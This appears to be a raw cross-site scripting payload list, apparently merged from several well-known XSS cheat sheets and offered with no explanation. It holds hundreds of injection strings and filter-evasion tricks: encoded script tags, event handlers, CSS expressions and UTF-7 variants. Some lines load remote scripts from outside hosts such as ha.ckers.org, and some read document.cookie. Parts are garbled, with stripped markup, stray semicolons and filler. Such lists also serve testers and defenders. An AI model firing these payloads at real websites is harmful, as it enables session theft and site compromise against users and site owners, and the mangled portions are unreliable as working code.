+ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “>alert(document.cookie) “><alert(document.cookie);//< fooalert(document.cookie) <script>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; alert(document.cookie)   alert(1) “>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))   ‘;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–“=0\”autofocus/onfocus=alert(1)–>”-confirm(3)-”           <a>xxs link</a> <a>xxs link</a> alert(“XSS”)”>                 <alert(“XSS”);//< <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>  <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// alert(‘XSS’); alert(“XSS”);     li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS        @import’http://ha.ckers.org/xss.css'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss”)} @im\port’\ja\vasc\ript:alert(“XSS”)';  exp/*<A> alert(‘XSS’); .XSS{background-image:url(“javascript:alert(‘XSS’)”);}<A></A> BODY{background:url(“javascript:alert(‘XSS’)”)}   ¼script¾alert(¢XSS¢)¼/script¾             <!--[if gte IE 4]>alert('XSS');<![endif]-->   <!–#exec cmd="/bin/echo '<!--#exec cmd= <? echo('alert(“XSS”)’); ?> <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”> +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- ” SRC=”http://ha.ckers.org/xss.js”> ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ` SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> XSS 0\”autofocus/onfocus=alert(1)–>”-confirm(3)-” veris–>group element[attribute=’ [
[” onmouseover=”alert(‘RVRSH3LL_XSS’);” ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; alert;pg(“XSS”) for((i)in(self))eval(i)(1) <script>alert(1)</script><script>alert(1)</script> <sCRiPt>alert(1)</SCrIPt> test %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; “>”>123 “>123 “>123 “>alert(`TEXT YOU WANT TO BE DISPLAYED`);123 “>123 >Hover the cursor to the LEFT of this Message&ParamHeight=250 “>”>123 “>123 <iframe src=http://xss.rocks/scriptlet.html < {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=“ onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=“&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /**/alert(1)/**/</script /**/ "> <iframe/src="data:text/html,”> <script xlink:href=data&colon;,window.open('https://www.google.com/') </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ‘`”>javascript:alert(1) ‘`”>javascript:alert(1) \x3Cscript>javascript:alert(1) ‘”`>/* *\x2Fjavascript:alert(1)// */ javascript:alert(1)</script\x0D javascript:alert(1)</script\x0A javascript:alert(1)</script\x0B javascript:alert(1) <!–\x3E –> –> –> –> –> –> `”‘> test “‘`>a=’hello\x27;javascript:alert(1)//'; test test test test test test test test test test test test test test /* *\x2A/javascript:alert(1)// */ /* *\x00/javascript:alert(1)// */ </style\x3E </style\x0D </style\x09 </style\x20 </style\x0A “‘`>ABCDEF “‘`>ABCDEF if(“x\\xE1\x96\x89″.length==2) { javascript:alert(1);} if(“x\\xE0\xB9\x92″.length==2) { javascript:alert(1);} if(“x\\xEE\xA9\x93″.length==2) { javascript:alert(1);} ‘`”>javascript:alert(1) ‘`”>javascript:alert(1) “‘`> “‘`> javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> “`’>\x3Bjavascript:alert(1) “`’>\x0Djavascript:alert(1) “`’>\xEF\xBB\xBFjavascript:alert(1) “`’>\xE2\x80\x81javascript:alert(1) “`’>\xE2\x80\x84javascript:alert(1) “`’>\xE3\x80\x80javascript:alert(1) “`’>\x09javascript:alert(1) “`’>\xE2\x80\x89javascript:alert(1) “`’>\xE2\x80\x85javascript:alert(1) “`’>\xE2\x80\x88javascript:alert(1) “`’>\x00javascript:alert(1) “`’>\xE2\x80\xA8javascript:alert(1) “`’>\xE2\x80\x8Ajavascript:alert(1) “`’>\xE1\x9A\x80javascript:alert(1) “`’>\x0Cjavascript:alert(1) “`’>\x2Bjavascript:alert(1) “`’>\xF0\x90\x96\x9Ajavascript:alert(1) “`’>-javascript:alert(1) “`’>\x0Ajavascript:alert(1) “`’>\xE2\x80\xAFjavascript:alert(1) “`’>\x7Ejavascript:alert(1) “`’>\xE2\x80\x87javascript:alert(1) “`’>\xE2\x81\x9Fjavascript:alert(1) “`’>\xE2\x80\xA9javascript:alert(1) “`’>\xC2\x85javascript:alert(1) “`’>\xEF\xBF\xAEjavascript:alert(1) “`’>\xE2\x80\x83javascript:alert(1) “`’>\xE2\x80\x8Bjavascript:alert(1) “`’>\xEF\xBF\xBEjavascript:alert(1) “`’>\xE2\x80\x80javascript:alert(1) “`’>\x21javascript:alert(1) “`’>\xE2\x80\x82javascript:alert(1) “`’>\xE2\x80\x86javascript:alert(1) “`’>\xE1\xA0\x8Ejavascript:alert(1) “`’>\x0Bjavascript:alert(1) “`’>\x20javascript:alert(1) “`’>\xC2\xA0javascript:alert(1) “/> “/> “/> “/> “/> “/> “/> “/> “/> javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) “> “> “> “> “> “> “> “> “> “> “> “> “> “> “> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> javascript:alert(1) <video poster=javascript:javascript:alert(1)// …………… X X CLICKME CLICKME <!– <img src=" <img src=" XXX javascript:alert(1) <b alert(1)0 document.getElementById(“div2″).innerHTML = document.getElementById(“div1″).innerHTML; x javascript:alert(1)”> javascript:alert(1)”> javascript:alert(1)”> javascript:alert(1)’>”> javascript:alert(1)”> javascript:alert(1)”> d.innerHTML=d.innerHTML XXX <img src="x` `javascript:alert(1)”` `> “> <!–[if –> X p[foo=bar{}*{-o-link:’javascript:javascript:alert(1)’}{}*{-o-link-source:current}]{color:red}; <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d @import “data:,*%7bx:expression(javascript:alert(1))%7D”; XXXXXX *[{}@import’%(css)s?]X XXX XXX *{x:expression(javascript:alert(1))} X X with(document.getElementById(“d”))innerHTML=innerHTML X X XXX #x{font-family:foo[bar;color:green;} #y];color:red;{} XXX ({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval ({0:#0=eval/#0#/#0#(javascript:alert(1))}) ReferenceError.prototype.__defineGetter__(‘name’, function(){javascript:alert(1)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘javascript:alert(1)’)() &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi &alert&A7&(1)&R&UA;&& ¼script¾javascript:alert(1)¼/script¾ X 1 1 1 XXX x %(payload)s javascript:alert(1) <SCRIPT SRC=%(jscript)s? <%(payload)s//< <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < @import’%(css)s'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> li {list-style-image: url(“javascript:javascript:alert(1)”);}XSS javascript:alert(1); .XSS{background-image:url(“javascript:javascript:alert(1)”);} BODY{background:url(“javascript:javascript:alert(1)”)} XSS”””,”XML namespace.”),(“””<IMG SRC=”javascript:javascript:alert(1)”> +ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- X @import’%(css)s'; a{background:url(‘s1′ ‘s2)}@import javascript:javascript:alert(1);’);} &&javascript:alert(1)&&;&& javascript:alert(1); <![CDATA[<IMG SRC="javas]]]] test1 test1 <embed width=500 height=500 code="data:text/html,%(payload)s”> “> ‘;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//– >”>’>alert(String.fromCharCode(88,83,83)) ”;!–“= xxs link xxs link alert(“XSS”)”> perl -e ‘print “”;’ > out <alert(“XSS”);//< <SCRIPT SRC=http://ha.ckers.org/xss.js? <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// alert(“XSS”); li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS @import’http://ha.ckers.org/xss.css'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss”)} @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* alert(‘XSS’); .XSS{background-image:url(“javascript:alert(‘XSS’)”);} BODY{background:url(“javascript:alert(‘XSS’)”)} BODY{background:url(“javascript:alert(‘XSS’)”)} ¼script¾alert(¢XSS¢)¼/script¾ <!–#exec cmd="/bin/echo ' <? echo('alert(“XSS”)’); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”> +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- ” SRC=”http://ha.ckers.org/xss.js”> ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ` SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> XSS XSS XSS XSS XSS XSS {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=“ onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=“&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /**/alert(1)/**/</script /**/ "> <iframe/src="data:text/html,”> </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me ”;!–“=’>//\\,”>”>”*” ‘); alert(‘XSS alert(1); alert(‘XSS’); alert(“XSS”)”> <script>alert(‘XSS’);</script> alert(String.fromCharCode(88,83,83)) @im\port’\ja\vasc\ript:alert(\”XSS\”)'; <? echo('alert(\”XSS\”)’); ?> alert(‘XSS’) “>alert(0) alert(/xss/) alert(/xss/) alert(‘XSS’) window.alert(“Bonjour !”); <iframe onload=alert(‘XSS’)> “><script alert(String.fromCharCode(88,83,83)) ‘>>XSS ‘”>>alert(‘XSS’) ‘”>>XSS var var = 1; alert(var) BODY{background:url(“javascript:alert(‘XSS’)”)} <?='alert(“XSS”)’?> ” onfocus=alert(document.domain) “> <" li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}XSS perl -e ‘print \”alert(\”XSS\”)\”;’ > out perl -e ‘print \”\”;’ > out alert(1) alert(1) “> [color=red width=expression(alert(123))][color] Execute(MsgBox(chr(88)&chr(83)&chr(83)))alert(123) ‘”>alert(1111) ‘”>alert(document.cookie) ‘””> alert(‘X \nS \nS’); <<<>>><<alert(123) (123)(123) ‘>alert(123) ‘>”> }a=eval;b=alert;a(b(/XSS/.source)); document.write(“XSS”); a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d); =’>alert(“xss”) “+src=”http://yoursite.com/xss.js?69,69″> alert(navigator.userAgent)> “>/XaDoS/>alert(document.cookie) “>/KinG-InFeT.NeT/>alert(document.cookie) src=”http://www.site.com/XSS.js”> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !–” />alert(‘xss’); alert(“XSS by \nxss”)XSS by xss “>alert(“XSS by \nxss”)>XSS by xss ‘”>alert(“XSS by \nxss”)>XSS by xss alert(“XSS by \nxss”)XSS by xss alert(1337)XSS by xss “>alert(1337)”>alert(“XSS by \nxss ‘”>alert(1337)>XSS by xss XSS by xss ‘>alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83)); >”>alert(561177485777)%3B alert(“XSS”); ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//–></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!–"<XSS>=&{()} <SCRIPT>alert('XSS')</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BGSOUND SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG DYNSRC="javascript:alert('XSS');"> <IMG LOWSRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/*<XSS STYLE='no\xss:noxss("*//*"); <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IMG SRC="mocha:[code]"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> <HTML xmlns:xss> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert('XSS')"></B></I></XML> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <!–[if gte IE 4]> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!–#exec cmd="/bin/echo '<SCRIPT SRC'"–><!–#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"–> <? echo('<SCR)'; <BR SIZE="&{alert('XSS')}"> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- \";alert('XSS');// </TITLE><SCRIPT>alert(“XSS”);</SCRIPT> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > perl -e 'print "<IMG SRC=javascript:alert("XSS")>";'> out perl -e 'print "&<SCRIPT>alert("XSS")</SCRIPT>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <IFRAME SRC=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h tt p://6 6.000146.0×7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> document.vulnerable=true; <document.vulnerable=true;//< <script document.vulnerable=true; <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < a=/XSS/\ndocument.vulnerable=true; \”;document.vulnerable=true;;// document.vulnerable=true; li {list-style-image: url(“javascript:document.vulnerable=true;”);XSS 1script3document.vulnerable=true;1/script3 @im\port’\ja\vasc\ript:document.vulnerable=true'; exp/* document.vulnerable=true; .XSS{background-image:url(“javascript:document.vulnerable=true”);} BODY{background:url(“javascript:document.vulnerable=true”)} <![<IMG SRC="javas]]]] <IMG SRC="javascript:document.vulnerable=true”> <t:set attributeName="innerHTML" to="XSSdocument.vulnerable=true”> <? echo('document.vulnerable=true’); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=document.vulnerable=true”> +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- &document.vulnerable=true; <a href="about:document.vulnerable=true;”> document.vulnerable=true; <!–document.vulnerable=true;//–> <document.vulnerable=true; <![<!–]]document.vulnerable=true;//–> document.vulnerable=true; ” onmouseover=”document.vulnerable=true;”> document.vulnerable=true;; [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> @import’http://www.securitycompass.com/xss.css'; <meta HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss”)} XSS <!–#exec cmd="/bin/echo ' ” SRC=”http://www.securitycompass.com/xss.js”> ” SRC=”http://www.securitycompass.com/xss.js”> ” ” SRC=”http://www.securitycompass.com/xss.js”> ‘” SRC=”http://www.securitycompass.com/xss.js”> ` SRC=”http://www.securitycompass.com/xss.js”> ‘>” SRC=”http://www.securitycompass.com/xss.js”> document.write(“<SCRI");PT SRC=”http://www.securitycompass.com/xss.js”> [Mozilla] "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> </script><script>alert(1)</script> </br style=a:expression(alert())> <scrscriptipt>alert(1)</scrscriptipt> <br size=\"&{alert('XSS')}\"> perl -e 'print \"<IMG SRC=javascript:alert(\"XSS\")>\";' > out perl -e 'print \"<SCRIPT>alert(\"XSS\")</SCRIPT>\";' > out “>alert(‘XSS’) XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))> XSS STYLE=xss:e/**/xpression(alert(‘XSS’))> ‘;;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//”;;alert(String.fromCharCode(88,83,83))//\”;;alert(String.fromCharCode(88,83,83))//–>;;”;>;';>;;alert(String.fromCharCode(88,83,83)); ‘;';;!–“;;=&;{()} ;alert(‘;XSS';); ;; ;alert(String.fromCharCode(88,83,83)); ; ; ; ; ; ; ; ;;; ;; ; ; ; ; ; ; Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); ;li {list-style-image: url(“;javascript:alert('XSS')”;);};;;XSS ; ;; ; %BCscript%BEalert(%A2XSS%A2)%BC/script%BE ; ; ; ; ;; ;;; ;; a=”;get”;;&;#10;b=”;URL(“;”;;&;#10;c=”;javascript:”;;&;#10;d=”;alert(‘;XSS';);”;)”;; eval(a+b+c+d); ;alert(‘;XSS';);; ; ; ;.XSS{background-image:url(“;javascript:alert(‘;XSS';)”;);};;; ;BODY{background:url(“;javascript:alert(‘;XSS';)”;)}; ; ; ;@import';http://ha.ckers.org/xss.css';;; <;META HTTP-EQUIV=";Link"; Content=";;; REL=stylesheet”;>; ;BODY{-moz-binding:url(“;http://ha.ckers.org/xssmoz.xml#xss”;)}; ;; ;;;; ; ;;;<;![CDATA[;;]]>; ;;;<;IMG SRC=";javas;cript:alert(‘;XSS';)”;>;;;; ;; ;; ; <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=;alert(‘;XSS';);”;>; ; ;; <;!–#exec cmd=";/bin/echo ';;;;';”;–>; <;? echo(';<;SCR)';; ; ; ; ; ; ; ; ; ; ;; ;+ADw-SCRIPT+AD4-alert(‘;XSS';);+ADw-/SCRIPT+AD4- \”;;alert(‘;XSS';);// ;;alert(“XSS”);; ;@im\port';\ja\vasc\ript:alert(“;XSS”;)';;; ; ; ; ; ; perl -e ‘;print “;”;;';>; out perl -e ‘;print “;&;;alert(“;XSS”;);”;;'; >; out ; ;; ; <;SCRIPT SRC=http://ha.ckers.org/xss.js ; <;IMG SRC=";javascript:alert(';XSS';)"; <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; <;;alert(“;XSS”;);//<;; ;;alert(“;XSS”;);”;>; ;a=/XSS/ ;”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;; ;; ;';”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;` SRC=”;http://ha.ckers.org/xss.js”;>;; ;document.write(“;<;SCRI";);;PT SRC=”;http://ha.ckers.org/xss.js”;>;; ‘;>”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; document.vulnerable=true; <document.vulnerable=true;//< <script document.vulnerable=true; <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < a=/XSS/\ndocument.vulnerable=true; \”;document.vulnerable=true;;// document.vulnerable=true; li {list-style-image: url(“javascript:document.vulnerable=true;”);XSS 1script3document.vulnerable=true;1/script3 